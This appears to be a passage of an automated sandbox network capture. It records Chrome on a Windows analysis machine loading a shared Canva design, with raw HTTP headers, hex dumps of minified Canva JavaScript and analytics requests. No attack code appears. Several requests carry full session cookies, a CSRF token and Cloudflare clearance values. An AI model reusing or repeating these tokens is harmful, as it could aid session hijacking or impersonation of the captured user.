                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1149INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:52 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                                    Content-Length: 219912
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595159cd077286-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 49967
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:38 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 20 Nov 2024 00:58:15 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    Timing-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 21 Nov 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: KSMYt/AFncIb5oyg7Z1B6GdYTge0dqiKIo7Jxy7pER4GrIh6gzyS1fM0rGShmLyS2HsoMEBntzs=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: CPYJX6Y6BH2TTM87
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: 4sRSSWwkWdOgwGR6zC4nDbT6TH3BqjnM
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC358INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 37 4c 4b 4d 30 72 6f 61 52 52 4d 4e 4f 4e 65 45 66 48 45 43 54 4b 6d 6f 62 37 6a 42 77 30 47 47 38 4a 49 52 63 7a 68 71 78 49 72 6e 73 49 44 68 77 7a 53 65 56 30 52 36 39 57 47 6e 4d 4e 67 6c 54 7a 55 78 70 6a 55 34 51 41 64 70 66 66 77 56 67 58 55 67 68 47 78 58 38 4d 53 4a 44 67 50 32 51 43 59 4c 6d 38 50 4f 36 6b 63 76 45 6a 78 6e 39 6b 77 74 46 68 77 52 6d 25 32 46 64 63 55 66 6f 6f 66 53 49 5a 69 59 75 61 54 62 74 69 52 52 38 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7LKM0roaRRMNONeEfHECTKmob7jBw0GG8JIRczhqxIrnsIDhwzSeV0R69WGnMNglTzUxpjU4QAdpffwVgXUghGxX8MSJDgP2QCYLm8PO6kcvEjxn9kwtFhwRm%2FdcUfoofSIZiYuaTbtiRR8%3D"}],"group":"cf-nel","max_age
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1231INData Raw: 3b 2f 2f 20 5f 5f 46 49 4c 45 5f 43 4f 4e 54 45 4e 54 5f 46 4f 52 5f 5f 3a 33 65 31 65 30 35 62 61 32 34 65 65 36 66 37 30 2e 6a 73 0a 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 39 37 36 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 33 37 36 36 39 39 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f
                                                                                                                                                                                                                                                                    Data Ascii: ;// __FILE_CONTENT_FOR__:3e1e05ba24ee6f70.js(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[9976],{/***/ 376699:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30 3a 6e 75 6c 6c 3d 3d 3d 28 62 3d 64 2e 59 68 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 76 6f 69 64 20 30 3a 62 2e 74 79 70 65 29 3d 3d 3d 5f 5f 63 2e 71 77 29 3b 0a 62 3d 64 2e 59 68 2e 76 61 6c 75 65 3b 73 77 69 74 63 68 28 62 2e 74 79 70 65 29 7b 63 61 73 65 20 22 69 6e 76 61 6c 69 64 22 3a 62 3d 62 2e 61 69 61 3b 62 72 65 61 6b 3b 63 61 73 65 20 22 63 61 6e 6f 6e 69 63 61 6c 22 3a 62 3d 62 2e 49 4f 3b 62 72 65 61 6b 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 42 28 62 29 3b 7d 5f 5f 63 2e 77 28 62 2e 73 74 61 72 74 73 57 69 74 68 28 22 3d 22 29 29 3b 63 6f 6e 73 74 20 65 3d 64 2e 4c 50 3b 62 3d 7b 74 79 70 65 3a 22 64 6f 6d 22 2c 72 65 6e 64 65 72 3a 68 3d 3e 68 2e 69 6e 6e 65
                                                                                                                                                                                                                                                                    Data Ascii: =d||void 0===d?void 0:null===(b=d.Yh)||void 0===b?void 0:b.type)===__c.qw);b=d.Yh.value;switch(b.type){case "invalid":b=b.aia;break;case "canonical":b=b.IO;break;default:throw new B(b);}__c.w(b.startsWith("="));const e=d.LP;b={type:"dom",render:h=>h.inne
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 74 72 61 6e 73 66 6f 72 6d 3a 60 73 63 61 6c 65 28 24 7b 64 7d 29 60 7d 2c 63 6c 61 73 73 4e 61 6d 65 3a 22 62 78 37 34 75 51 22 2c 63 68 69 6c 64 72 65 6e 3a 4c 38 28 5f 5f 63 2e 56 69 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 4d 38 28 7b 79 69 6d 6c 31 67 3a 65 2c 6f 59 6c 68 58 41 3a 66 7d 29 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 61 6c 69 67 6e 6d 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 63 68 69 6c 64 72 65 6e 3a 61 7d 29 7d 29 7d 2c 77 59 63 3d 66 75 6e 63 74 69 6f 6e 28 7b 59 6b 3a 61 2c 68 69 67 68 6c 69 67 68 74 3a 62 2c 73 63 61 6c 65 3a 63 2c 50 41 3a 64 2c 55 71 3a 65 2c 50 32 61 3a 66 7d 29 7b 63 6f 6e 73 74 20 67 3d 4e 38 28 28 29 3d 3e 7b 63 6f 6e 73 74 20 6d 3d 0a 6e 75 6c 6c 3d 3d 3d 64 7c 7c 76 6f 69 64 20 30 3d 3d 3d 64 3f 76 6f 69 64 20 30
                                                                                                                                                                                                                                                                    Data Ascii: transform:`scale(${d})`},className:"bx74uQ",children:L8(__c.Vi,{className:M8({yiml1g:e,oYlhXA:f}),size:"small",alignment:"center",children:a})})},wYc=function({Yk:a,highlight:b,scale:c,PA:d,Uq:e,P2a:f}){const g=N8(()=>{const m=null===d||void 0===d?void 0
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 65 63 74 69 6f 6e 26 26 61 2e 62 5a 61 28 66 2e 73 65 6c 65 63 74 69 6f 6e 29 2e 68 61 73 28 6e 29 2c 5b 66 2e 73 65 6c 65 63 74 69 6f 6e 5d 29 2c 6d 3d 50 38 28 6e 3d 3e 6e 75 6c 6c 21 3d 66 2e 73 65 6c 65 63 74 69 6f 6e 26 26 61 2e 56 6a 62 28 66 2e 73 68 65 65 74 2c 66 2e 73 65 6c 65 63 74 69 6f 6e 29 2e 68 61 73 28 6e 29 2c 5b 66 2e 73 68 65 65 74 2c 66 2e 73 65 6c 65 63 74 69 6f 6e 5d 29 3b 72 65 74 75 72 6e 20 4c 38 28 52 38 2c 7b 2e 2e 2e 66 2c 73 63 61 6c 65 3a 67 2c 55 71 3a 6b 2c 55 5a 61 3a 6d 2c 56 52 61 3a 6c 2c 41 58 3a 62 7d 29 7d 29 3b 72 65 74 75 72 6e 7b 77 33 61 3a 63 2c 76 33 61 3a 64 2c 78 33 61 3a 65 7d 7d 2c 41 59 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 61 2e 48 76 2c 63 3d 28 29 3d 3e 6e 75 6c 6c 3b 72 65
                                                                                                                                                                                                                                                                    Data Ascii: ection&&a.bZa(f.selection).has(n),[f.selection]),m=P8(n=>null!=f.selection&&a.Vjb(f.sheet,f.selection).has(n),[f.sheet,f.selection]);return L8(R8,{...f,scale:g,Uq:k,UZa:m,VRa:l,AX:b})});return{w3a:c,v3a:d,x3a:e}},AYc=function(a){const b=a.Hv,c=()=>null;re
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 21 3d 62 2e 4c 63 26 26 6e 75 6c 6c 21 3d 62 2e 6b 65 26 26 6e 75 6c 6c 21 3d 62 2e 4a 65 29 7b 76 61 72 20 63 3d 0a 61 2e 45 61 28 62 2e 48 63 29 2c 64 3d 61 2e 48 61 28 62 2e 4c 63 29 2c 65 3d 61 2e 45 61 28 62 2e 6b 65 29 2b 62 2e 6b 65 2e 77 69 64 74 68 2d 63 3b 61 3d 61 2e 48 61 28 62 2e 4a 65 29 2b 62 2e 4a 65 2e 68 65 69 67 68 74 2d 64 3b 72 65 74 75 72 6e 20 5f 5f 63 2e 6e 41 28 7b 74 6f 70 3a 64 2c 6c 65 66 74 3a 63 2c 77 69 64 74 68 3a 65 2c 68 65 69 67 68 74 3a 61 7d 29 7d 7d 2c 4a 59 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 61 2e 48 76 2c 63 3d 28 29 3d 3e 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 64 3d 3e 4c 38 28 49 59 63 2c 7b 2e 2e 2e 64 2c 48 76 3a 62 2c 41 6e 3a 63 7d 29 7d 2c 4b 59 63 3d 66 75 6e 63 74 69 6f 6e 28 61
                                                                                                                                                                                                                                                                    Data Ascii: !=b.Lc&&null!=b.ke&&null!=b.Je){var c=a.Ea(b.Hc),d=a.Ha(b.Lc),e=a.Ea(b.ke)+b.ke.width-c;a=a.Ha(b.Je)+b.Je.height-d;return __c.nA({top:d,left:c,width:e,height:a})}},JYc=function(a){const b=a.Hv,c=()=>null;return d=>L8(IYc,{...d,Hv:b,An:c})},KYc=function(a
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 28 76 2e 49 61 29 29 3b 72 3d 22 73 74 61 72 74 22 3d 3d 3d 72 2e 62 6f 75 6e 64 61 72 79 3f 71 2e 73 74 61 72 74 3a 71 2e 65 6e 64 3b 71 3d 43 2e 73 74 61 72 74 3b 76 3d 22 73 74 61 72 74 22 3d 3d 3d 76 2e 62 6f 75 6e 64 61 72 79 3f 75 2e 73 74 61 72 74 3a 75 2e 65 6e 64 3b 72 65 74 75 72 6e 7b 63 6f 6c 6f 72 3a 78 2c 77 65 69 67 68 74 3a 79 2c 43 63 3a 6e 2c 70 31 3a 6e 65 77 20 5f 5f 63 2e 48 6e 28 72 2c 71 2b 7a 29 2c 70 32 3a 6e 65 77 20 5f 5f 63 2e 48 6e 28 72 2c 76 2b 70 29 2c 2e 2e 2e 5f 5f 63 2e 48 42 28 76 2d 71 2c 6e 2a 79 2c 7a 29 7d 7d 7d 29 2e 66 69 6c 74 65 72 28 5f 5f 63 2e 65 62 29 2c 0a 2e 2e 2e 61 5d 7d 2c 52 59 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 3d 5b 5d 3b 61 3d 61 2e 66 69 6c 74 65 72 28 63 3d 3e 30 21 3d
                                                                                                                                                                                                                                                                    Data Ascii: (v.Ia));r="start"===r.boundary?q.start:q.end;q=C.start;v="start"===v.boundary?u.start:u.end;return{color:x,weight:y,Cc:n,p1:new __c.Hn(r,q+z),p2:new __c.Hn(r,v+p),...__c.HB(v-q,n*y,z)}}}).filter(__c.eb),...a]},RYc=function(a){const b=[];a=a.filter(c=>0!=
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 68 2e 63 6f 6c 75 6d 6e 3d 3d 3d 6c 2e 63 6f 6c 75 6d 6e 26 26 68 2e 62 6f 75 6e 64 61 72 79 3d 3d 3d 6c 2e 62 6f 75 6e 64 61 72 79 3b 68 26 26 28 68 3d 67 2e 42 59 61 2c 68 3d 68 2e 49 61 3d 3d 3d 6b 2e 49 61 26 26 68 2e 62 6f 75 6e 64 61 72 79 3d 3d 3d 6b 2e 62 6f 75 6e 64 61 72 79 29 3b 68 26 26 67 2e 63 6f 6c 6f 72 3d 3d 3d 63 2e 63 6f 6c 6f 72 26 26 67 2e 77 65 69 67 68 74 3d 3d 3d 63 2e 77 65 69 67 68 74 26 26 67 2e 43 63 3d 3d 3d 63 2e 43 63 26 26 30 3d 3d 3d 67 2e 43 63 3f 67 2e 6d 73 61 3d 66 3a 65 2e 70 75 73 68 28 7b 42 59 61 3a 6b 2c 64 79 62 3a 6c 2c 6d 73 61 3a 66 2c 63 6f 6c 6f 72 3a 63 2e 63 6f 6c 6f 72 2c 77 65 69 67 68 74 3a 63 2e 77 65 69 67 68 74 2c 43 63 3a 63 2e 43 63 7d 29 7d 7d 72 65 74 75 72 6e 20 65 7d 2c 4f 59 63 3d 66 75 6e 63
                                                                                                                                                                                                                                                                    Data Ascii: h.column===l.column&&h.boundary===l.boundary;h&&(h=g.BYa,h=h.Ia===k.Ia&&h.boundary===k.boundary);h&&g.color===c.color&&g.weight===c.weight&&g.Cc===c.Cc&&0===g.Cc?g.msa=f:e.push({BYa:k,dyb:l,msa:f,color:c.color,weight:c.weight,Cc:c.Cc})}}return e},OYc=func
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 65 78 74 28 64 5b 64 2e 6c 65 6e 67 74 68 2d 0a 31 5d 2e 49 61 29 29 26 26 65 2e 70 75 73 68 28 7b 49 61 3a 64 2c 62 6f 75 6e 64 61 72 79 3a 22 73 74 61 72 74 22 7d 29 3b 66 6f 72 28 63 6f 6e 73 74 20 71 20 6f 66 20 68 29 7b 68 3d 28 64 3d 22 73 74 61 72 74 22 3d 3d 3d 71 2e 62 6f 75 6e 64 61 72 79 3f 71 2e 63 6f 6c 75 6d 6e 3a 76 6f 69 64 20 30 29 3f 62 2e 6c 61 79 6f 75 74 2e 63 6f 6c 73 2e 6a 65 28 64 29 3a 62 2e 6c 61 79 6f 75 74 2e 63 6f 6c 73 2e 6c 61 73 74 28 29 3b 66 6f 72 28 63 6f 6e 73 74 20 72 20 6f 66 20 65 29 7b 76 61 72 20 6c 3d 22 73 74 61 72 74 22 3d 3d 3d 72 2e 62 6f 75 6e 64 61 72 79 3f 72 2e 49 61 3a 76 6f 69 64 20 30 3b 6b 3d 6c 3f 62 2e 6c 61 79 6f 75 74 2e 72 6f 77 73 2e 6a 65 28 6c 29 3a 62 2e 6c 61 79 6f 75 74 2e 72 6f 77 73 2e 6c
                                                                                                                                                                                                                                                                    Data Ascii: ext(d[d.length-1].Ia))&&e.push({Ia:d,boundary:"start"});for(const q of h){h=(d="start"===q.boundary?q.column:void 0)?b.layout.cols.je(d):b.layout.cols.last();for(const r of e){var l="start"===r.boundary?r.Ia:void 0;k=l?b.layout.rows.je(l):b.layout.rows.l
                                                                                                                                                                                                                                                                    2024-11-20 15:01:52 UTC1369INData Raw: 3d 5f 5f 63 2e 46 42 28 62 2e 62 6f 72 64 65 72 53 74 79 6c 65 2c 61 2e 62 6f 72 64 65 72 53 74 79 6c 65 2c 64 2c 63 2c 65 2c 6e 75 6c 6c 3d 3d 3d 66 7c 7c 76 6f 69 64 20 30 3d 3d 3d 66 3f 76 6f 69 64 20 30 3a 66 2e 62 6f 72 64 65 72 53 74 79 6c 65 29 7d 72 65 74 75 72 6e 20 61 7d 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 3d 28 66 3d 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 62 6f 72 64 65 72 53 74 79 6c 65 29 26 26 76 6f 69 64 20 30 21 3d 3d 0a 66 3f 66 3a 6e 75 6c 6c 3d 3d 3d 62 7c 7c 76 6f 69 64 20 30 3d 3d 3d 62 3f 76 6f 69 64 20 30 3a 62 2e 62 6f 72 64 65 72 53 74 79 6c 65 7d 2c 55 59 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3b 63 6f 6e 73 74 20 66 3d 62 26 26 63 26 26 61
                                                                                                                                                                                                                                                                    Data Ascii: =__c.FB(b.borderStyle,a.borderStyle,d,c,e,null===f||void 0===f?void 0:f.borderStyle)}return a}return null!==(f=null===a||void 0===a?void 0:a.borderStyle)&&void 0!==f?f:null===b||void 0===b?void 0:b.borderStyle},UYc=function(a,b,c,d){var e;const f=b&&c&&a


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    120192.168.2.1249854104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:53 UTC2734OUTPOST /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Length: 4330
                                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-App: design_viewer
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    X-Canva-Build-Sha: 4aaacc3
                                                                                                                                                                                                                                                                    X-Csrf-Token: m65uuiM4hOHpo06dgSPhRqPEhdCRKiuvQOasLfvHE7DP5kTUrBM4kf_aI1UofOUgkerkC_LfxNF6gOeRLqtMopdba-0
                                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-Analytics: AAMAA1dFQgA=
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Content-Type: application/json;charset=UTF-8
                                                                                                                                                                                                                                                                    X-Canva-Request: recordanalyticseventbatch
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241118-21
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/design/DAGXBQfQ3AM/BvO9V97vV3Qk87FqBY6pdQ/view?utm_content=DAGXBQfQ3AM&utm_campaign=designshare&utm_medium=link&utm_source=editor
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO [TRUNCATED]
                                                                                                                                                                                                                                                                    2024-11-20 15:01:53 UTC4330OUTData Raw: 7b 22 41 22 3a 5b 7b 22 41 3f 22 3a 22 44 22 2c 22 41 22 3a 7b 22 41 22 3a 22 32 62 36 66 62 39 35 32 2d 39 36 36 61 2d 34 32 34 34 2d 61 37 64 36 2d 35 32 63 34 66 35 63 30 66 38 63 65 22 2c 22 45 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 31 35 3a 30 31 3a 34 39 2e 33 31 38 5a 22 2c 22 46 22 3a 22 32 30 32 34 2d 31 31 2d 32 30 54 31 35 3a 30 31 3a 35 30 2e 37 35 30 5a 22 2c 22 48 22 3a 22 65 6e 22 2c 22 49 22 3a 7b 22 41 22 3a 22 55 53 22 7d 2c 22 4a 22 3a 22 57 45 42 22 2c 22 4b 22 3a 7b 22 57 4b 4c 55 4f 22 3a 22 41 22 2c 22 57 4b 44 55 49 22 3a 22 41 22 2c 22 56 53 57 4c 4f 22 3a 22 42 22 2c 22 55 54 43 55 49 22 3a 22 42 22 2c 22 54 4f 4d 4c 4f 22 3a 22 41 22 2c 22 52 52 53 43 32 22 3a 22 43 22 2c 22 50 52 54 43 32 22 3a 22 42 22 2c 22 50 52 46 44 4f
                                                                                                                                                                                                                                                                    Data Ascii: {"A":[{"A?":"D","A":{"A":"2b6fb952-966a-4244-a7d6-52c4f5c0f8ce","E":"2024-11-20T15:01:49.318Z","F":"2024-11-20T15:01:50.750Z","H":"en","I":{"A":"US"},"J":"WEB","K":{"WKLUO":"A","WKDUI":"A","VSWLO":"B","UTCUI":"B","TOMLO":"A","RRSC2":"C","PRTC2":"B","PRFDO
                                                                                                                                                                                                                                                                    2024-11-20 15:01:53 UTC1069INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:53 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951616c05c347-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors 'self' https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: sameorigin
                                                                                                                                                                                                                                                                    x-request-id: 8e5951616c05c347
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FbHZ3hGoruImV7b%2BiMu%2BZPaHe%2FG8NYzYdciZgUG%2FmaRzyvqU9F%2BgCZKYuXDLQ4pjEQBS1AH9SpqbfjYhc2PE361jdGHiWENJSJC5BzIqR1Q9TCrwf6rC9s7lZke8bSg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:53 UTC28INData Raw: 31 36 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 16'"])}while(1);</x>//{}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    121192.168.2.1249857104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:53 UTC2522OUTGET /_ajax/csrf3/designinsight HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    X-Canva-Brand: BAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-App: design_viewer
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    X-Canva-Build-Sha: 4aaacc3
                                                                                                                                                                                                                                                                    X-Canva-User: UAAAAAAAAAA
                                                                                                                                                                                                                                                                    X-Canva-Analytics: AAMAA1dFQgA=
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    X-Canva-Request: recordheartbeat
                                                                                                                                                                                                                                                                    sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                                    X-Canva-Locale: en
                                                                                                                                                                                                                                                                    X-Canva-Build-Name: 20241118-21
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
